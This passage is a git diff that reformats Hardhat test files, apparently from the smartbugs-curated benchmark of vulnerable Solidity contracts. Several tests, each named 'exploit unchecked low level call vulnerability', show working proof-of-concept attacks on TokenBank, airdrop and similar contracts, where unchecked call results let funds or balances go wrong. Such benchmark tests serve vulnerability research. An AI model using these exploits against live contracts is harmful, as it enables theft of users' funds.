unchecked_low_level_calls/0x39cfd754c85023648bf003bea2dd498c5612abfa.sol in WithdrawToken()', async function () { - const {contract, successContract} = await loadFixture(deployContracts); + it("sanity check: unchecked_low_level_calls/0x39cfd754c85023648bf003bea2dd498c5612abfa.sol in WithdrawToken()", async function () { + const { contract, successContract } = await loadFixture(deployContracts); await expect(contract.connect(owner).initTokenBank()).to.not.be.reverted; const amount = ethers.parseEther("2"); - await expect(successContract.connect(owner).transfer(contract.target, amount)).to.not.be.reverted; + await expect( + successContract.connect(owner).transfer(contract.target, amount), + ).to.not.be.reverted; expect(await successContract.balanceOf(contract.target)).to.equal(amount); - await expect(owner.sendTransaction({ + await expect( + owner.sendTransaction({ to: contract.target, value: amount, - })).to.not.be.reverted; + }), + ).to.not.be.reverted; expect(await ethers.provider.getBalance(contract.target)).to.equal(amount); expect(await contract.Holders(owner.address)).to.equal(amount); - await expect(contract.WitdrawTokenToHolder(owner.address, successContract.target, amount)).to.not.be.reverted; + await expect( + contract.WitdrawTokenToHolder( + owner.address, + successContract.target, + amount, + ), + ).to.not.be.reverted; expect(await contract.Holders(owner.address)).to.equal(0); - expect(await successContract.balanceOf(owner.address)).to.equal(ethers.parseEther("10")); + expect(await successContract.balanceOf(owner.address)).to.equal( + ethers.parseEther("10"), + ); expect(await successContract.balanceOf(successContract.target)).to.equal(0); }); it("exploit unchecked low level call vulnerability in WithdrawToken()", async function () { - const {contract, revertContract} = await loadFixture(deployContracts); + const { contract, revertContract } = await loadFixture(deployContracts); await contract.connect(owner).initTokenBank(); @@ -59,14 +78,14 @@ describe("attack unchecked_low_level_calls/0x39cfd754c85023648bf003bea2dd498c561 sig.sendTransaction({ to: revertContract.target, value: oneEther, - }) + }), ).to.be.revertedWith("I always revert!"); const amount = ethers.parseEther("2"); // Signer deposits ether to become a holder await sig.sendTransaction({ - to: contract.target, - value: amount, + to: contract.target, + value: amount, }); expect(await ethers.provider.getBalance(contract.target)).to.equal(amount); @@ -75,23 +94,27 @@ describe("attack unchecked_low_level_calls/0x39cfd754c85023648bf003bea2dd498c561 expect(await contract.Holders(sig.address)).to.equal(amount); // signer puts the wrong address in the withdraw function - await contract.WitdrawTokenToHolder(sig.address, revertContract.target, amount); + await contract.WitdrawTokenToHolder( + sig.address, + revertContract.target, + amount, + ); //signer no longer holds tokens expect(await contract.Holders(sig.address)).to.equal(0); - const revertBalance = await ethers.provider.getBalance(revertContract.target); + const revertBalance = await ethers.provider.getBalance( + revertContract.target, + ); // the wrong contract doesn't get the ether expect(revertBalance).to.equal(0); // the contract still holds the ether expect(await ethers.provider.getBalance(contract.target)).to.equal(amount); - - }); it("exploit unchecked low level call vulnerability in WithdrawToHolder()", async function () { - const {contract, revertContract} = await loadFixture(deployContracts); + const { contract, revertContract } = await loadFixture(deployContracts); await contract.connect(owner).initTokenBank(); @@ -103,36 +126,42 @@ describe("attack unchecked_low_level_calls/0x39cfd754c85023648bf003bea2dd498c561 sig.sendTransaction({ to: revertContract.target, value: oneEther, - }) + }), ).to.be.revertedWith("I always revert!"); const amount = ethers.parseEther("2"); - await revertContract.connect(sig).sendEther(contract.target, {value: amount}); + await revertContract + .connect(sig) + .sendEther(contract.target, { value: amount }); await owner.sendTransaction({ - to: contract.target, - value: amount, + to: contract.target, + value: amount, }); - expect(await ethers.provider.getBalance(contract.target)).to.equal(amount + amount); + expect(await ethers.provider.getBalance(contract.target)).to.equal( + amount + amount, + ); expect(await contract.Holders(revertContract.target)).to.equal(amount); expect(await contract.Holders(owner.address)).to.equal(amount); - await contract.connect(owner).WithdrawToHolder(revertContract.target, amount); + await contract + .connect(owner) + .WithdrawToHolder(revertContract.target, amount); expect(await contract.Holders(owner.address)).to.equal(amount); expect(await contract.Holders(revertContract.target)).to.equal(0); - - const revertBalance = await ethers.provider.getBalance(revertContract.target); + const revertBalance = await ethers.provider.getBalance( + revertContract.target, + ); expect(revertBalance).to.equal(0); - expect(await ethers.provider.getBalance(contract.target)).to.equal(amount + amount); - + expect(await ethers.provider.getBalance(contract.target)).to.equal( + amount + amount, + ); }); - - }); diff --git a/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x3a0e9acd953ffc0dd18d63603488846a6b8b2b01_test.js b/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x3a0e9acd953ffc0dd18d63603488846a6b8b2b01_test.js index 7aada40..f8ce6bf 100644 --- a/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x3a0e9acd953ffc0dd18d63603488846a6b8b2b01_test.js +++ b/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x3a0e9acd953ffc0dd18d63603488846a6b8b2b01_test.js @@ -1,5 +1,5 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); @@ -7,32 +7,42 @@ describe("attack unchecked_low_level_calls/0x3a0e9acd953ffc0dd18d63603488846a6b8 let owner, sig; async function deployContracts() { [owner, sig] = await ethers.getSigners(); - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/unchecked_low_level_calls/0x3a0e9acd953ffc0dd18d63603488846a6b8b2b01.sol/TokenBank.json'); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/unchecked_low_level_calls/0x3a0e9acd953ffc0dd18d63603488846a6b8b2b01.sol/TokenBank.json", + ); const json = JSON.parse(fs.readFileSync(codePath)); const TokenBank = await ethers.getContractFactory(json.abi, json.bytecode); const contract = await TokenBank.connect(owner).deploy(); - const RevertContract = await ethers.getContractFactory("contracts/unchecked_low_level_calls/revert_contract.sol:RevertContract"); + const RevertContract = await ethers.getContractFactory( + "contracts/unchecked_low_level_calls/revert_contract.sol:RevertContract", + ); const revertContract = await RevertContract.deploy(); - const TokenEBU = await ethers.getContractFactory("contracts/unchecked_low_level_calls/TokenEBU.sol:TokenEBU"); + const TokenEBU = await ethers.getContractFactory( + "contracts/unchecked_low_level_calls/TokenEBU.sol:TokenEBU", + ); const token = await TokenEBU.connect(owner).deploy(10, "EBU", "EBU"); - return {contract, revertContract, token} - }; + return { contract, revertContract, token }; + } - it('sanity check: unchecked_low_level_calls/0x3a0e9acd953ffc0dd18d63603488846a6b8b2b01.sol', async function () { - const {contract, token} = await loadFixture(deployContracts); + it("sanity check: unchecked_low_level_calls/0x3a0e9acd953ffc0dd18d63603488846a6b8b2b01.sol", async function () { + const { contract, token } = await loadFixture(deployContracts); const ownerBalance = await token.balanceOf(owner.address); - await expect(token.connect(owner).transfer(contract.target, 10)).to.not.be.reverted; + await expect(token.connect(owner).transfer(contract.target, 10)).to.not.be + .reverted; expect(await token.balanceOf(contract.target)).to.equal(10); await expect(contract.initTokenBank()).to.not.be.reverted; - await expect(contract.connect(owner).WithdrawToken(token.target, 10, owner.address)).to.not.be.reverted; + await expect( + contract.connect(owner).WithdrawToken(token.target, 10, owner.address), + ).to.not.be.reverted; expect(await token.balanceOf(owner.address)).to.equal(ownerBalance); }); it("exploit unchecked low level call vulnerability in WithdrawToken()", async function () { - const {contract, revertContract} = await loadFixture(deployContracts); + const { contract, revertContract } = await loadFixture(deployContracts); await contract.connect(owner).initTokenBank(); @@ -44,14 +54,14 @@ describe("attack unchecked_low_level_calls/0x3a0e9acd953ffc0dd18d63603488846a6b8 sig.sendTransaction({ to: revertContract.target, value: oneEther, - }) + }), ).to.be.revertedWith("I always revert!"); const amount = ethers.parseEther("2"); // Signer deposits ether to become a holder await sig.sendTransaction({ - to: contract.target, - value: amount, + to: contract.target, + value: amount, }); expect(await ethers.provider.getBalance(contract.target)).to.equal(amount); @@ -60,23 +70,27 @@ describe("attack unchecked_low_level_calls/0x3a0e9acd953ffc0dd18d63603488846a6b8 expect(await contract.Holders(sig.address)).to.equal(amount); // signer puts the wrong address in the withdraw function - await contract.WitdrawTokenToHolder(sig.address, revertContract.target, amount); + await contract.WitdrawTokenToHolder( + sig.address, + revertContract.target, + amount, + ); //signer no longer holds tokens expect(await contract.Holders(sig.address)).to.equal(0); - const revertBalance = await ethers.provider.getBalance(revertContract.target); + const revertBalance = await ethers.provider.getBalance( + revertContract.target, + ); // the wrong contract doesn't get the ether expect(revertBalance).to.equal(0); // the contract still holds the ether expect(await ethers.provider.getBalance(contract.target)).to.equal(amount); - - }); it("exploit unchecked low level call vulnerability in WithdrawToHolder()", async function () { - const {contract, revertContract} = await loadFixture(deployContracts); + const { contract, revertContract } = await loadFixture(deployContracts); await contract.connect(owner).initTokenBank(); @@ -88,36 +102,42 @@ describe("attack unchecked_low_level_calls/0x3a0e9acd953ffc0dd18d63603488846a6b8 sig.sendTransaction({ to: revertContract.target, value: oneEther, - }) + }), ).to.be.revertedWith("I always revert!"); const amount = ethers.parseEther("2"); - await revertContract.connect(sig).sendEther(contract.target, {value: amount}); + await revertContract + .connect(sig) + .sendEther(contract.target, { value: amount }); await owner.sendTransaction({ - to: contract.target, - value: amount, + to: contract.target, + value: amount, }); - expect(await ethers.provider.getBalance(contract.target)).to.equal(amount + amount); + expect(await ethers.provider.getBalance(contract.target)).to.equal( + amount + amount, + ); expect(await contract.Holders(revertContract.target)).to.equal(amount); expect(await contract.Holders(owner.address)).to.equal(amount); - await contract.connect(owner).WithdrawToHolder(revertContract.target, amount); + await contract + .connect(owner) + .WithdrawToHolder(revertContract.target, amount); expect(await contract.Holders(owner.address)).to.equal(amount); expect(await contract.Holders(revertContract.target)).to.equal(0); - - const revertBalance = await ethers.provider.getBalance(revertContract.target); + const revertBalance = await ethers.provider.getBalance( + revertContract.target, + ); expect(revertBalance).to.equal(0); - expect(await ethers.provider.getBalance(contract.target)).to.equal(amount + amount); - + expect(await ethers.provider.getBalance(contract.target)).to.equal( + amount + amount, + ); }); - - }); diff --git a/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x4051334adc52057aca763453820cb0e045076ef3_test.js b/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x4051334adc52057aca763453820cb0e045076ef3_test.js index 7948ff0..19bc16c 100644 --- a/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x4051334adc52057aca763453820cb0e045076ef3_test.js +++ b/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x4051334adc52057aca763453820cb0e045076ef3_test.js @@ -1,35 +1,53 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); describe("attack unchecked_low_level_calls/0x4051334adc52057aca763453820cb0e045076ef3.sol", function () { - let owner, sig; + let owner, sig; async function deployContracts() { [owner, sig] = await ethers.getSigners(); - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/unchecked_low_level_calls/0x4051334adc52057aca763453820cb0e045076ef3.sol/airdrop.json'); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/unchecked_low_level_calls/0x4051334adc52057aca763453820cb0e045076ef3.sol/airdrop.json", + ); const json = JSON.parse(fs.readFileSync(codePath)); const airdrop = await ethers.getContractFactory(json.abi, json.bytecode); const contract = await airdrop.deploy(); - const TokenEBU = await ethers.getContractFactory("contracts/unchecked_low_level_calls/TokenEBU.sol:TokenEBU"); + const TokenEBU = await ethers.getContractFactory( + "contracts/unchecked_low_level_calls/TokenEBU.sol:TokenEBU", + ); const token = await TokenEBU.connect(owner).deploy(1, "EBU", "EBU"); - const SuccessContract = await ethers.getContractFactory("contracts/unchecked_low_level_calls/success_contract.sol:SuccessContract"); + const SuccessContract = await ethers.getContractFactory( + "contracts/unchecked_low_level_calls/success_contract.sol:SuccessContract", + ); const success_contract = await SuccessContract.deploy(); - return {contract, token, success_contract} - }; + return { contract, token, success_contract }; + } - it('sanity check: unchecked_low_level_calls/0x4051334adc52057aca763453820cb0e045076ef3.sol', async function () { - const {contract, success_contract} = await loadFixture(deployContracts); + it("sanity check: unchecked_low_level_calls/0x4051334adc52057aca763453820cb0e045076ef3.sol", async function () { + const { contract, success_contract } = await loadFixture(deployContracts); const amount = ethers.parseEther("1"); - await expect(contract.connect(owner).transfer(owner.address, success_contract.target, [contract.target], amount)).to.not.be.reverted; - expect(await success_contract.balanceOf(contract.target)).to.be.equal(amount); + await expect( + contract + .connect(owner) + .transfer( + owner.address, + success_contract.target, + [contract.target], + amount, + ), + ).to.not.be.reverted; + expect(await success_contract.balanceOf(contract.target)).to.be.equal( + amount, + ); }); it("exploit unchecked low level call vulnerability", async function () { - const {contract, token} = await loadFixture(deployContracts); + const { contract, token } = await loadFixture(deployContracts); const amount = await token.balanceOf(owner.address); expect(amount).to.be.equal(1000000000000000000n); @@ -48,11 +66,11 @@ describe("attack unchecked_low_level_calls/0x4051334adc52057aca763453820cb0e0450 const val = 10; // it does not revert cause the return value of call is not checked - await expect(contract.transfer(from, token.target, to, val)).not.be.reverted; + await expect(contract.transfer(from, token.target, to, val)).not.be + .reverted; // the second transfer does not happen expect(await token.balanceOf(owner)).to.be.equal(amount - BigInt(val)); expect(await token.balanceOf(contract.target)).to.be.equal(10); expect(await token.balanceOf(sig.address)).to.be.equal(0); - }); }); diff --git a/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x4b71ad9c1a84b9b643aa54fdd66e2dec96e8b152_test.js b/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x4b71ad9c1a84b9b643aa54fdd66e2dec96e8b152_test.js index 54da65a..aca1b91 100644 --- a/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x4b71ad9c1a84b9b643aa54fdd66e2dec96e8b152_test.js +++ b/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x4b71ad9c1a84b9b643aa54fdd66e2dec96e8b152_test.js @@ -1,34 +1,48 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); describe("attack unchecked_low_level_calls/0x4b71ad9c1a84b9b643aa54fdd66e2dec96e8b152.sol", function () { - let owner, sig; + let owner, sig; async function deployContracts() { [owner, sig] = await ethers.getSigners(); - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/unchecked_low_level_calls/0x4b71ad9c1a84b9b643aa54fdd66e2dec96e8b152.sol/airPort.json'); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/unchecked_low_level_calls/0x4b71ad9c1a84b9b643aa54fdd66e2dec96e8b152.sol/airPort.json", + ); const json = JSON.parse(fs.readFileSync(codePath)); const airPort = await ethers.getContractFactory(json.abi, json.bytecode); const contract = await airPort.deploy(); - const TokenEBU = await ethers.getContractFactory("contracts/unchecked_low_level_calls/TokenEBU.sol:TokenEBU"); + const TokenEBU = await ethers.getContractFactory( + "contracts/unchecked_low_level_calls/TokenEBU.sol:TokenEBU", + ); const token = await TokenEBU.connect(owner).deploy(1, "EBU", "EBU"); - const SuccessContract = await ethers.getContractFactory("contracts/unchecked_low_level_calls/success_contract.sol:SuccessContract"); + const SuccessContract = await ethers.getContractFactory( + "contracts/unchecked_low_level_calls/success_contract.sol:SuccessContract", + ); const success_contract = await SuccessContract.connect(owner).deploy(); - return {contract, token, success_contract} - }; + return { contract, token, success_contract }; + } - it('sanity check: unchecked_low_level_calls/0x4b71ad9c1a84b9b643aa54fdd66e2dec96e8b152.sol', async function () { - const {contract, success_contract} = await loadFixture(deployContracts); - await expect(contract.transfer(owner.address, success_contract.target, [contract.target], 10)).to.not.be.reverted; + it("sanity check: unchecked_low_level_calls/0x4b71ad9c1a84b9b643aa54fdd66e2dec96e8b152.sol", async function () { + const { contract, success_contract } = await loadFixture(deployContracts); + await expect( + contract.transfer( + owner.address, + success_contract.target, + [contract.target], + 10, + ), + ).to.not.be.reverted; expect(await success_contract.balanceOf(contract.target)).to.equal(10); }); it("exploit unchecked low level call vulnerability", async function () { - const {contract, token} = await loadFixture(deployContracts); + const { contract, token } = await loadFixture(deployContracts); const amount = await token.balanceOf(owner.address); expect(amount).to.be.equal(1000000000000000000n); @@ -47,11 +61,11 @@ describe("attack unchecked_low_level_calls/0x4b71ad9c1a84b9b643aa54fdd66e2dec96e const val = 10; // it does not revert cause the return value o all is not checked - await expect(contract.transfer(from, token.target, to, val)).not.be.reverted; + await expect(contract.transfer(from, token.target, to, val)).not.be + .reverted; // the second transfer does not happen expect(await token.balanceOf(owner)).to.be.equal(amount - BigInt(val)); expect(await token.balanceOf(contract.target)).to.be.equal(10); expect(await token.balanceOf(sig.address)).to.be.equal(0); - }); }); diff --git a/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x52d2e0f9b01101a59b38a3d05c80b7618aeed984_test.js b/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x52d2e0f9b01101a59b38a3d05c80b7618aeed984_test.js index b5d3054..98bea9f 100644 --- a/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x52d2e0f9b01101a59b38a3d05c80b7618aeed984_test.js +++ b/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x52d2e0f9b01101a59b38a3d05c80b7618aeed984_test.js @@ -1,44 +1,51 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); describe("attack unchecked_low_level_calls/0x52d2e0f9b01101a59b38a3d05c80b7618aeed984.sol", function () { - let owner; async function deployContracts() { [owner] = await ethers.getSigners(); - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/unchecked_low_level_calls/0x52d2e0f9b01101a59b38a3d05c80b7618aeed984.sol/EtherGet.json'); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/unchecked_low_level_calls/0x52d2e0f9b01101a59b38a3d05c80b7618aeed984.sol/EtherGet.json", + ); const json = JSON.parse(fs.readFileSync(codePath)); const EtherGet = await ethers.getContractFactory(json.abi, json.bytecode); const contract = await EtherGet.connect(owner).deploy(); - const RevertContract = await ethers.getContractFactory("contracts/unchecked_low_level_calls/revert_contract.sol:RevertContract"); + const RevertContract = await ethers.getContractFactory( + "contracts/unchecked_low_level_calls/revert_contract.sol:RevertContract", + ); const revertContract = await RevertContract.deploy(); - const SuccessContract = await ethers.getContractFactory("contracts/unchecked_low_level_calls/success_contract.sol:SuccessContract"); + const SuccessContract = await ethers.getContractFactory( + "contracts/unchecked_low_level_calls/success_contract.sol:SuccessContract", + ); const successContract = await SuccessContract.connect(owner).deploy(); - return {contract, revertContract, successContract} - }; + return { contract, revertContract, successContract }; + } - it('sanity check: unchecked_low_level_calls/0x52d2e0f9b01101a59b38a3d05c80b7618aeed984.sol', async function () { - const {contract, successContract} = await loadFixture(deployContracts); - await expect(contract.connect(owner).getTokens(2, successContract.target)).to.not.be.reverted; + it("sanity check: unchecked_low_level_calls/0x52d2e0f9b01101a59b38a3d05c80b7618aeed984.sol", async function () { + const { contract, successContract } = await loadFixture(deployContracts); + await expect(contract.connect(owner).getTokens(2, successContract.target)) + .to.not.be.reverted; }); it("exploit unchecked low level call vulnerability", async function () { - const {contract, revertContract} = await loadFixture(deployContracts); + const { contract, revertContract } = await loadFixture(deployContracts); const amount = ethers.parseEther("1"); await expect( owner.sendTransaction({ to: revertContract.target, value: amount, - }) + }), ).to.be.revertedWith("I always revert!"); - await expect(contract.connect(owner).getTokens(2, revertContract.target)).to.not.be.reverted; - + await expect(contract.connect(owner).getTokens(2, revertContract.target)).to + .not.be.reverted; }); }); diff --git a/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x627fa62ccbb1c1b04ffaecd72a53e37fc0e17839_test.js b/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x627fa62ccbb1c1b04ffaecd72a53e37fc0e17839_test.js index 9b242fb..61fd185 100644 --- a/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x627fa62ccbb1c1b04ffaecd72a53e37fc0e17839_test.js +++ b/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x627fa62ccbb1c1b04ffaecd72a53e37fc0e17839_test.js @@ -1,5 +1,5 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); @@ -7,47 +7,66 @@ describe("attack unchecked_low_level_calls/0x627fa62ccbb1c1b04ffaecd72a53e37fc0e let owner, sig; async function deployContracts() { [owner, sig] = await ethers.getSigners(); - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/unchecked_low_level_calls/0x627fa62ccbb1c1b04ffaecd72a53e37fc0e17839.sol/TokenBank.json'); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/unchecked_low_level_calls/0x627fa62ccbb1c1b04ffaecd72a53e37fc0e17839.sol/TokenBank.json", + ); const json = JSON.parse(fs.readFileSync(codePath)); const TokenBank = await ethers.getContractFactory(json.abi, json.bytecode); const contract = await TokenBank.connect(owner).deploy(); - const RevertContract = await ethers.getContractFactory("contracts/unchecked_low_level_calls/revert_contract.sol:RevertContract"); + const RevertContract = await ethers.getContractFactory( + "contracts/unchecked_low_level_calls/revert_contract.sol:RevertContract", + ); const revertContract = await RevertContract.deploy(); - const SuccessContract = await ethers.getContractFactory("contracts/unchecked_low_level_calls/success_contract.sol:SuccessContract"); + const SuccessContract = await ethers.getContractFactory( + "contracts/unchecked_low_level_calls/success_contract.sol:SuccessContract", + ); const successContract = await SuccessContract.connect(owner).deploy(); - return {contract, revertContract, successContract} - }; + return { contract, revertContract, successContract }; + } - it('sanity check: unchecked_low_level_calls/0x627fa62ccbb1c1b04ffaecd72a53e37fc0e17839.sol', async function () { - const {contract, successContract} = await loadFixture(deployContracts); + it("sanity check: unchecked_low_level_calls/0x627fa62ccbb1c1b04ffaecd72a53e37fc0e17839.sol", async function () { + const { contract, successContract } = await loadFixture(deployContracts); await expect(contract.connect(owner).initTokenBank()).to.not.be.reverted; const amount = ethers.parseEther("2"); - await expect(successContract.connect(owner).transfer(contract.target, amount)).to.not.be.reverted; + await expect( + successContract.connect(owner).transfer(contract.target, amount), + ).to.not.be.reverted; expect(await successContract.balanceOf(contract.target)).to.equal(amount); - await expect(owner.sendTransaction({ + await expect( + owner.sendTransaction({ to: contract.target, value: amount, - })).to.not.be.reverted; + }), + ).to.not.be.reverted; expect(await ethers.provider.getBalance(contract.target)).to.equal(amount); expect(await contract.Holders(owner.address)).to.equal(amount); - await expect(contract.WitdrawTokenToHolder(owner.address, successContract.target, amount)).to.not.be.reverted; + await expect( + contract.WitdrawTokenToHolder( + owner.address, + successContract.target, + amount, + ), + ).to.not.be.reverted; expect(await contract.Holders(owner.address)).to.equal(0); - expect(await successContract.balanceOf(owner.address)).to.equal(ethers.parseEther("10")); + expect(await successContract.balanceOf(owner.address)).to.equal( + ethers.parseEther("10"), + ); expect(await successContract.balanceOf(successContract.target)).to.equal(0); }); it("exploit unchecked low level call vulnerability in WithdrawToken()", async function () { - const {contract, revertContract} = await loadFixture(deployContracts); + const { contract, revertContract } = await loadFixture(deployContracts); await contract.connect(owner).initTokenBank(); @@ -59,14 +78,14 @@ describe("attack unchecked_low_level_calls/0x627fa62ccbb1c1b04ffaecd72a53e37fc0e sig.sendTransaction({ to: revertContract.target, value: oneEther, - }) + }), ).to.be.revertedWith("I always revert!"); const amount = ethers.parseEther("2"); // Signer deposits ether to become a holder await sig.sendTransaction({ - to: contract.target, - value: amount, + to: contract.target, + value: amount, }); expect(await ethers.provider.getBalance(contract.target)).to.equal(amount); @@ -75,19 +94,22 @@ describe("attack unchecked_low_level_calls/0x627fa62ccbb1c1b04ffaecd72a53e37fc0e expect(await contract.Holders(sig.address)).to.equal(amount); // signer puts the wrong address in the withdraw function - await contract.WitdrawTokenToHolder(sig.address, revertContract.target, amount); + await contract.WitdrawTokenToHolder( + sig.address, + revertContract.target, + amount, + ); //signer no longer holds tokens expect(await contract.Holders(sig.address)).to.equal(0); - const revertBalance = await ethers.provider.getBalance(revertContract.target); + const revertBalance = await ethers.provider.getBalance( + revertContract.target, + ); // the wrong contract doesn't get the ether expect(revertBalance).to.equal(0); // the contract still holds the ether expect(await ethers.provider.getBalance(contract.target)).to.equal(amount); - - }); - }); diff --git a/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x663e4229142a27f00bafb5d087e1e730648314c3_test.js b/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x663e4229142a27f00bafb5d087e1e730648314c3_test.js index 2df5fb9..1a009b9 100644 --- a/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x663e4229142a27f00bafb5d087e1e730648314c3_test.js +++ b/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x663e4229142a27f00bafb5d087e1e730648314c3_test.js @@ -1,176 +1,257 @@ -const { loadFixture, mine, setBalance} = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); -const { getContractAddress } = require('@ethersproject/address') +const { + loadFixture, + mine, + setBalance, +} = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); +const { getContractAddress } = require("@ethersproject/address"); const path = require("path"); const fs = require("fs"); describe("attack unchecked_low_level_calls/0x663e4229142a27f00bafb5d087e1e730648314c3.sol", function () { - let owner, amount; async function deployContracts() { [owner] = await ethers.getSigners(); amount = ethers.parseEther("1.0"); - let ownerNonce = await owner.getNonce() + 1; + let ownerNonce = (await owner.getNonce()) + 1; let futureAddress = getContractAddress({ from: owner.address, - nonce: ownerNonce + nonce: ownerNonce, }); await owner.sendTransaction({ to: futureAddress, value: amount, }); - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/unchecked_low_level_calls/0x663e4229142a27f00bafb5d087e1e730648314c3.sol/PandaCore.json'); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/unchecked_low_level_calls/0x663e4229142a27f00bafb5d087e1e730648314c3.sol/PandaCore.json", + ); const json = JSON.parse(fs.readFileSync(codePath)); const PandaCore = await ethers.getContractFactory(json.abi, json.bytecode); const contract = await PandaCore.connect(owner).deploy(); - const GeneScience = await ethers.getContractFactory("contracts/unchecked_low_level_calls/0x663e4229142a27f00bafb5d087e1e730648314c3_attack.sol:GeneScience"); + const GeneScience = await ethers.getContractFactory( + "contracts/unchecked_low_level_calls/0x663e4229142a27f00bafb5d087e1e730648314c3_attack.sol:GeneScience", + ); const geneScience = await GeneScience.connect(owner).deploy(); await contract.connect(owner).setGeneScienceAddress(geneScience.target); - const PandaCaller = await ethers.getContractFactory("contracts/unchecked_low_level_calls/0x663e4229142a27f00bafb5d087e1e730648314c3_attack.sol:PandaCaller"); - const pandaCaller = await PandaCaller.connect(owner).deploy(contract.target); + const PandaCaller = await ethers.getContractFactory( + "contracts/unchecked_low_level_calls/0x663e4229142a27f00bafb5d087e1e730648314c3_attack.sol:PandaCaller", + ); + const pandaCaller = await PandaCaller.connect(owner).deploy( + contract.target, + ); await contract.connect(owner).setCFO(pandaCaller.target); - const PandaCallerSuccess = await ethers.getContractFactory("contracts/unchecked_low_level_calls/0x663e4229142a27f00bafb5d087e1e730648314c3_attack.sol:PandaCallerSuccess"); - const pandaCallerSuccess = await PandaCallerSuccess.connect(owner).deploy(contract.target); + const PandaCallerSuccess = await ethers.getContractFactory( + "contracts/unchecked_low_level_calls/0x663e4229142a27f00bafb5d087e1e730648314c3_attack.sol:PandaCallerSuccess", + ); + const pandaCallerSuccess = await PandaCallerSuccess.connect(owner).deploy( + contract.target, + ); - const MyERC721 = await ethers.getContractFactory("contracts/unchecked_low_level_calls/0x663e4229142a27f00bafb5d087e1e730648314c3_attack.sol:MyERC721"); + const MyERC721 = await ethers.getContractFactory( + "contracts/unchecked_low_level_calls/0x663e4229142a27f00bafb5d087e1e730648314c3_attack.sol:MyERC721", + ); const nft = await MyERC721.connect(owner).deploy(); - const MyERC721Success = await ethers.getContractFactory("contracts/unchecked_low_level_calls/0x663e4229142a27f00bafb5d087e1e730648314c3_attack.sol:MyERC721Success"); + const MyERC721Success = await ethers.getContractFactory( + "contracts/unchecked_low_level_calls/0x663e4229142a27f00bafb5d087e1e730648314c3_attack.sol:MyERC721Success", + ); const nftSuccess = await MyERC721Success.connect(owner).deploy(); - const salePath = path.join(__dirname, '../../artifacts/contracts/dataset/unchecked_low_level_calls/0x663e4229142a27f00bafb5d087e1e730648314c3.sol/SaleClockAuction.json'); + const salePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/unchecked_low_level_calls/0x663e4229142a27f00bafb5d087e1e730648314c3.sol/SaleClockAuction.json", + ); const saleJson = JSON.parse(fs.readFileSync(salePath)); - const SaleClockAuction = await ethers.getContractFactory(saleJson.abi, saleJson.bytecode); - const saleAuction = await SaleClockAuction.connect(owner).deploy(nft.target, 10); + const SaleClockAuction = await ethers.getContractFactory( + saleJson.abi, + saleJson.bytecode, + ); + const saleAuction = await SaleClockAuction.connect(owner).deploy( + nft.target, + 10, + ); await setBalance(saleAuction.target, amount); - const saleAuctionSuccess = await SaleClockAuction.connect(owner).deploy(nftSuccess.target, 10); + const saleAuctionSuccess = await SaleClockAuction.connect(owner).deploy( + nftSuccess.target, + 10, + ); await setBalance(saleAuctionSuccess.target, amount); - const siringPath = path.join(__dirname, '../../artifacts/contracts/dataset/unchecked_low_level_calls/0x663e4229142a27f00bafb5d087e1e730648314c3.sol/SiringClockAuction.json'); + const siringPath = path.join( + __dirname, + "../../artifacts/contracts/dataset/unchecked_low_level_calls/0x663e4229142a27f00bafb5d087e1e730648314c3.sol/SiringClockAuction.json", + ); const siringJson = 